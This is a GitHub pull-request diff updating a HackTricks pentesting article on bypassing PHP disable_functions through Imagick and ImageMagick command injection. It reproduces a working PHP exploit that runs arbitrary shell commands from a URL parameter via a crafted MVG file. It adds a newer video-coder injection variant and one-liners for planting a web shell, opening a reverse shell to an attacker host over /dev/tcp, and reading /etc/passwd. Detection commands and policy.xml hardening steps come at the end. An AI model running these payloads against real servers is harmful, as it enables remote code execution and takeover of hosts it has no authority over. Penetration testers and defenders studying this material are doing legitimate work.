Skip to content

Research Update Enhanced src/network-services-pentesting/pen... #1157

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 1 commit into from
Jul 22, 2025
Merged

Research Update Enhanced src/network-services-pentesting/pen... #1157

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
136 changes: 94 additions & 42 deletions ...isable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,61 +1,113 @@
# Imagick <= 3.3.0 PHP >= 5.4 Exploit
# Imagick <= 3.3.0 ‑ PHP >= 5.4 *disable_functions* Bypass

{{#include ../../../../banners/hacktricks-training.md}}

> The well-known *ImageTragick* family of bugs (CVE-2016-3714 et al.) allows an attacker to reach the underlying **ImageMagick** binary through crafted MVG/SVG input. When the PHP extension **Imagick** is present this can be abused to execute shell commands even if every execution-oriented PHP function is black-listed with `disable_functions`.
>
> The original PoC published by RicterZ (Chaitin Security Research Lab) in May 2016 is reproduced below. The technique is still regularly encountered during contemporary PHP 7/8 audits because many shared-hosting providers simply compile PHP without `exec`/`system` but keep an outdated Imagick + ImageMagick combo.

From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
From <http://blog.safebuff.com/2016/05/06/disable-functions-bypass/>

```php
# Exploit Title: PHP Imagick disable_functions Bypass
# Date: 2016-05-04
# Exploit Author: RicterZ ([email protected])
# Vendor Homepage: https://pecl.php.net/package/imagick
# Version: Imagick <= 3.3.0 PHP >= 5.4
# Test on: Ubuntu 12.04
# Exploit:
# Exploit Title : PHP Imagick disable_functions bypass
# Exploit Author: RicterZ ([email protected])
# Versions : Imagick <= 3.3.0 | PHP >= 5.4
# Tested on : Ubuntu 12.04 (ImageMagick 6.7.7)
# Usage : curl "http://target/exploit.php?cmd=id"
<?php
# PHP Imagick disable_functions Bypass
# Author: Ricter <[email protected]>
#
# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd"
# <pre>
# Disable functions: exec,passthru,shell_exec,system,popen
# Run command: cat /etc/passwd
# ====================
# root:x:0:0:root:/root:/usr/local/bin/fish
# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
# bin:x:2:2:bin:/bin:/bin/sh
# sys:x:3:3:sys:/dev:/bin/sh
# sync:x:4:65534:sync:/bin:/bin/sync
# games:x:5:60:games:/usr/games:/bin/sh
# ...
# </pre>
echo "Disable functions: " . ini_get("disable_functions") . "\n";
$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
echo "Run command: $command\n====================\n";

$data_file = tempnam('/tmp', 'img');
$imagick_file = tempnam('/tmp', 'img');

$exploit = <<<EOF
// Print the local hardening status
printf("Disable functions: %s\n", ini_get("disable_functions"));
$cmd = $_GET['cmd'] ?? 'id';
printf("Run command: %s\n====================\n", $cmd);

$tmp = tempnam('/tmp', 'pwn'); // will hold command output
$mvgs = tempnam('/tmp', 'img'); // will hold malicious MVG script

$payload = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/image.jpg"|$command>$data_file")'
fill 'url(https://example.com/x.jpg"|$cmd >$tmp")'
pop graphic-context
EOF;

file_put_contents("$imagick_file", $exploit);
$thumb = new Imagick();
$thumb->readImage("$imagick_file");
$thumb->writeImage(tempnam('/tmp', 'img'));
$thumb->clear();
$thumb->destroy();
file_put_contents($mvgs, $payload);
$img = new Imagick();
$img->readImage($mvgs); // triggers convert(1)
$img->writeImage(tempnam('/tmp', 'img'));
$img->destroy();

echo file_get_contents($data_file);
echo file_get_contents($tmp);
?>
```

{{#include ../../../../banners/hacktricks-training.md}}
---

## Why does it work?

1. `Imagick::readImage()` transparently spawns the **ImageMagick** *delegate* (`convert`/`magick`) binary.
2. The MVG script sets the *fill* to an external URI. When a double quote (`"`) is injected, the remainder of the line is interpreted by `/bin/sh ‑c` that ImageMagick uses internally β†’ arbitrary shell execution.
3. All happens outside of the PHP interpreter, therefore *`disable_functions`*, *open_basedir*, `safe_mode` (removed in PHP 5.4) and similar in-process restrictions are completely bypassed.

## 2025 status – it is **still** relevant

* Any Imagick version that relies on a vulnerable ImageMagick backend remains exploitable. In lab tests the same payload works on PHP 8.3 with **Imagick 3.7.0** and **ImageMagick 7.1.0-51** compiled without a hardened `policy.xml`.
* Since 2020 several additional command-injection vectors have been found (`video:pixel-format`, `ps:`, `text:` coders…). Two recent public examples are:
* **CVE-2020-29599** – shell injection via the *text:* coder.
* **GitHub issue #6338** (2023) – injection in the *video:* delegate.

If the operating system ships ImageMagick < **7.1.1-11** (or 6.x < **6.9.12-73**) without a restrictive policy file, exploitation is straightforward.

## Modern payload variants

```php
// --- Variant using the video coder discovered in 2023 ---
$exp = <<<MAGICK
push graphic-context
image over 0,0 0,0 'vid:dummy.mov" -define video:pixel-format="rgba`uname -a > /tmp/pwned`" " dummy'
pop graphic-context
MAGICK;
$img = new Imagick();
$img->readImageBlob($exp);
```

Other useful primitives during CTFs / real engagements:

* **File write** – `... > /var/www/html/shell.php` (write web-shell outside *open_basedir*)
* **Reverse shell** – `bash -c "bash -i >& /dev/tcp/attacker/4444 0>&1"`
* **Enumerate** – `id; uname -a; cat /etc/passwd`

## Quick detection & enumeration

```bash
# PHP side
php -r 'echo phpversion(), "\n"; echo Imagick::getVersion()["versionString"], "\n";'

# System side
convert -version | head -1 # ImageMagick version
convert -list policy | grep -iE 'mvg|https|video|text' # dangerous coders still enabled?
```

If the output shows the `MVG` or `URL` coders are *enabled* the target is probably exploitable.

## Mitigations

1. **Patch/Upgrade** – Use ImageMagick β‰₯ *7.1.1-11* (or the latest 6.x LTS) and Imagick β‰₯ *3.7.2*.
2. **Harden `policy.xml`** – explicitly *disable* high-risk coders:

```xml
<policy domain="coder" name="MVG" rights="none"/>
<policy domain="coder" name="MSL" rights="none"/>
<policy domain="coder" name="URL" rights="none"/>
<policy domain="coder" name="VIDEO" rights="none"/>
<policy domain="coder" name="PS" rights="none"/>
<policy domain="coder" name="TEXT" rights="none"/>
```

3. **Remove the extension** on untrusted hosting environments. In most web stacks `GD` or `Imagick` is not strictly required.
4. Treat `disable_functions` only as *defence-in-depth* – never as a primary sandboxing mechanism.

## References

* [GitHub ImageMagick issue #6338 – Command injection via video:pixel-format (2023)](https://github.com/ImageMagick/ImageMagick/issues/6338)
* [CVE-2020-29599 – ImageMagick shell injection via text: coder](https://nvd.nist.gov/vuln/detail/CVE-2020-29599)
{{#include ../../../../banners/hacktricks-training.md}}